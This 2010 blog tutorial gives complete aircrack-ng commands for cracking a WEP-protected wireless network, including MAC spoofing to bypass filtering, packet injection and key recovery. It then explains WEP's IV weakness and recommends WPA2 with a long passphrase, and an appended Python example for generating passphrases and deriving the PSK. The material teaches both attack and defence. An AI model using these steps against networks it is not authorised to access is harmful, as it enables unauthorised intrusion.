Saturday, June 5, 2010

Cracking WEP Encrypted Wireless Network and Solution to Stronger Security

This tutorial will explain the steps in cracking into a WEP (Wired Equivalent Privacy) encrypted wireless network, the reason for the vulnerabilities in WEP, and proper steps in protecting yourself from having your wireless network penetrated.

Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools. We will be using the Aircrack suite that is included with the Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.

2. A wireless adapter that allows passive packet sniffing and packet injection. I am using Alfa AWUS036H Wireless Adapter. The USB connection, good antenna, and ease of use make the adapter a good choice.

3. Wireless router. I am using Cisco-Linksys WRT54GL wireless router.


1. Boot up Backtrack. The login is "root" and the password is "toor." Do not include quotes or the period at the end of toor. Type "startx" at the next prompt.

2. Open up a Konsole window. It is the 3rd icon from the right on the lower left hand corner.
  • In the steps, I post what I actually typed as you can see on the screen shots. Below the steps is the syntax for the command line. Replace the word in the parentheses with your actual data. Click on the screen shots for an expanded view.

3. Type airmon-ng at the command prompt and press enter to list the adapters associated with your computer. I only have the Alfa adapter which is the wlan0 interface.

4. Type airmon-ng stop wlan0 and press enter. This step takes wlan0 out of monitor mode so it can be reconfigured in the steps that follow.
airmon-ng stop (interface)

5. Type ifconfig wlan0 down and press enter. The step enables us to change our MAC address in the next step so we can access the wireless router even if it has a MAC address filter to prevent outsiders from entering.
ifconfig (interface) down

6. Type macchanger --mac 00:11:22:33:44:55 wlan0 and press enter. The MAC address is a physically embedded address for the network interface card (NIC). Every computer has a different MAC address. In order to penetrate into a wireless network with MAC filtering enabled, we would have to find out a legit MAC address that we can copy. For this tutorial, I am hacking into my own network without MAC filtering. I will be using a bogus MAC address for demonstration purposes.
macchanger --mac 00:11:22:33:44:55 (interface)

7. Type airmon-ng start wlan0 and press enter. This will put the wireless adapter in monitor mode.
airmon-ng start (interface)

8. Type airodump-ng wlan0 and press enter to display a list of wireless networks to penetrate. In the figure below, my network is listed second. Once you spot the network, hit ctrl+c together to stop the process.
airodump-ng (interface)

9. Type airodump-ng -c 6 -w Li --bssid 68:7F:74:27:99:B5 wlan0 and press enter. The -c 6 indicates channel 6; -w Li indicates that I will be saving a file named Li that will contain collected data packets. The bssid is the MAC address of the wireless router and wlan0 is the interface.
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

10. The figure below automatically pops up. Now, you are capturing data packets and saving the data packets to the specified file named earlier. You will need around 20,000 data packets to crack the WEP key. I've read that the number of packets can go as high as 80,000. The number in the "#Data" column is the amount of packets captured.

11. Open a new Konsole window and type aireplay-ng -1 0 -a 68:7F:74:27:99:B5 -h 00:11:22:33:44:55 -e LilRalph wlan0 and press enter.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

12. Type aireplay-ng -3 -b 68:7F:74:27:99:B5 -h 00:11:22:33:44:55 wlan0 and press enter. We are creating more router traffic to speed up the process of cracking the WEP key.
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

13. Once you have captured enough packets, open up a new Konsole window and type aircrack-ng -b 68:7F:74:27:99:B5 Li-01.cap and press enter. "Li-01.cap" is the file I created in step 9. I posted my screen shot of the file saved to the desktop. You can try every 5,000 packets. If it is not enough to crack the WEP key, the screen will display that it did not succeed and wait for more data packet capture. If it succeeded in cracking the WEP key, it will display the figure below with the key in hexadecimal format. You can type this hexadecimal number into the text box for the key without the colons and you have successfully hacked into the wireless network.
aircrack-ng -b (bssid) (file name-01.cap)

*The file, Li-01.cap, is where I will be saving the data captures

*Waiting for result.....

*....still waiting

*Failed. Hit ctrl+z to stop and the next time you try again, hit the up arrow key and press enter.

*Yay. Passed. Now, enter that security key without the colons to enter the network.


WEP uses the RC4 stream cipher. A 128 bit WEP key consists of a 104 bit secret key plus a 24 bit initialization vector (IV). The weakness that makes WEP easy to crack lies in the short IV, which is sent in clear text alongside each RC4-encrypted data packet. Because it is only 24 bits long, the clear text IV eventually repeats across different encrypted packets: WEP's IV size of 24 bits provides 16,777,216 (2 to the 24th power, since each bit is a 1 or a 0) different RC4 cipher streams for a given WEP key, regardless of key size. Depending on the amount of traffic (number of users on the network), the key can be cracked in a short amount of time.


Use WPA2 Personal with TKIP+AES or PSK encryption. The only realistic way for this security to be hacked is by having a weak password that can be cracked by password cracking tools. Another way, which is feasible but unrealistic, is brute force: trying every password combination with all possible characters. The crack is feasible given enough time but unrealistic because of how long it takes to crack a strong password. Therefore, use a strong password (guidelines and examples) for the key to the network. I recommend using this password generator site to generate a 63 character password and storing the password in Keepass (blog post about the product).
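As an added example (not the post's own code), here is the WPA2-PSK side of that recommendation in Python: the passphrase-to-PSK derivation the 802.11 standard specifies (PBKDF2-HMAC-SHA1 with the SSID as salt and 4096 iterations), a local CSPRNG-based generator standing in for the password generator site the post links to, and an entropy estimate that shows why brute-forcing a 63 character passphrase is unrealistic while an 8 character one is not. The guess rate passed to years_to_brute_force is an assumed figure, not a measurement; the SSID and passphrases in the demo are constructed values.

```python
import hashlib
import math
import secrets
import string

# The 802.11 standard restricts a WPA/WPA2 passphrase to 8..63 printable ASCII characters.
ALPHABET = string.ascii_letters + string.digits + string.punctuation  # 94 characters


def generate_passphrase(length: int = 63) -> str:
    """Random passphrase from the OS CSPRNG; 63 is the longest WPA2 allows."""
    if not 8 <= length <= 63:
        raise ValueError("WPA2 passphrases must be 8 to 63 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def is_valid_passphrase(passphrase: str) -> bool:
    """Length and character-set check matching the standard's passphrase rules."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    The 4096 iterations are what make each offline guess against a capture expensive."""
    if not is_valid_passphrase(passphrase):
        raise ValueError("invalid WPA2 passphrase")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def entropy_bits(length: int, alphabet_size: int = len(ALPHABET)) -> float:
    """Entropy of a uniformly random passphrase of the given length."""
    return length * math.log2(alphabet_size)


def years_to_brute_force(bits: float, guesses_per_second: float) -> float:
    """Expected time to search half the keyspace at an assumed guess rate (in years)."""
    return (2.0 ** bits / 2.0) / guesses_per_second / (365.25 * 24 * 3600)


if __name__ == "__main__":
    ssid = "LilRalph"                      # SSID from the post, used as the PBKDF2 salt
    strong = generate_passphrase(63)       # what the post recommends storing in a password manager
    print("generated passphrase:", strong)
    print("PSK:", derive_psk(strong, ssid).hex())
    assumed_rate = 1e6                     # assumed offline guesses per second, not a measurement
    for n in (8, 12, 63):
        bits = entropy_bits(n)
        print("%2d chars: %.1f bits, ~%.3g years to brute force at %g guesses/s"
              % (n, bits, years_to_brute_force(bits, assumed_rate), assumed_rate))
```

The PSK printed here is what the router and client actually use for the WPA2 handshake; an attacker with a capture must repeat the 4096-iteration derivation for every candidate passphrase, which is why the length and randomness of the passphrase, not the encryption algorithm, decide whether WPA2 Personal can be broken.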